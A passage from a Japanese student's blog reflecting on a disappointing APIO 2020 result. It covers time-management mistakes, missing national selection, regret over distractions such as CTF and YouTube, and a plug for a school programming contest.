まごまごしている内に残り 10 分を切りました．未だ 1 点も得ず．C 問題やらずに B の小課題 5 を実装すれば良かった... と思っても，今更そんな事はできません．さぁ，残り 5 分 になっても未だ進展はありません．

残り1分，30秒，15,14, ... そして C で 1 点も取れないまま競技は終了です．

4. 反省点・ポエム他

時間配分をミスっていた事，小さなバグに長い時間気が付かなかった事など非常に反省の余地があります． C 問題で小課題 1,2 から取っておけば良かったな... e.t.c. ただ，コンテストが終わった後に「〜だったら〜だったのに」みたいな事を言うのは大嫌いなので そういう事はしません．

良かった点としては，割と正しい難易度判定ができた事が挙げられると思います． 個人的に，9-10-? だと感じました．

全体の結果としては，Kodaman や blackyuki といった同級生が B で満点を取って代表となり，メダルを獲得した一方， 私は精進不足で部分永続 Union Find を知らず代表落ち，破滅となってしまいました．

非常に悔しいですが，これが実力です．APIOどころでなく破滅した春合宿直後は 「APIOに向けて極度精進するぞ！」と心に誓っていたのに，この4ヶ月の間に いつの間にかCTF をやっていたり（悪い事ではないけど） ，Youtubeに走ってしまったり（最悪）していた自分の信念の弱さが憎いです．

実際CTF は楽しいし役にも立ちますが，現実逃避の1つになっていたと考えられない事もないだろうと思います． CTF は別に大学生になってからでも全然できますが，情報オリンピックに参加できるのは残り僅か 3 年もありませんし， 同期がめちゃくちゃ強いので，今逃げてしまったら絶対にIOI代表にはなれないでしょう． 実際，今回私はAPIOで代表になり損ねました．

そういえば，小学生の時にやっていた暗算/珠算の時も同様でした． 今と同様（？）に全国レベルの実力はありましたが，上には上がいるという感じで どうしても勝てない同期がいたのです（名前は伏せますが，Googleで検索してみたらかなり有名になっていました）． 結局中学受験を理由に，暗算も九段のまま中途半端に終わる結果となってしまいました．

今の自分のままだと，暗算の時のように競プロも中途半端で終わってしまうんじゃないかと危惧しています． まぁ，こういうのも明日になったら忘れてたりするんですけどね...

これ以上重い感じ出すと界隈に悪影響与えそうなのでこれくらいで． ま，あんまり重い気持ちで競プロをやっても折角の楽しみが失われてしまうと思うので，これからも楽しんでやろうと思います！

5. い か が で し た か ？

実況で謎テンションをした挙げ句，ポエムで激重テンションをする謎ムーブ... 最後まで謎テンションに付き合って下さった皆様，ありがとうございました．

（宣伝）

第5回技術室奥プログラミングコンテストをyukicoderにて開催します！
筑駒パ研の中2から高2までの有志が主催するコンテストです。
22日のDay1はスピードラン、30日のDay2は高難度な問題を集めたコンテストになっていて、どちらも時間は5時間です。
是非ご参加ください！#技術室奥プロコン

— 筑駒パ研 (@tk_paken) August 16, 2020

（余談）

APIO のスタートボタンの下に書かれていた英文が，英語の例文チックで面白いなーと思いました（どうでも良い）

Welcome, APIO 2020 Contestants. APIO 2020 is a 5-hour virtual contest. To start your participation, click the "Click here to start your participation" button to start reading the problems and start your personal 5 hour timer.
Note that once your timer has started, there is no way to pause the timer. Do not press the button unless you are ready to start the contest.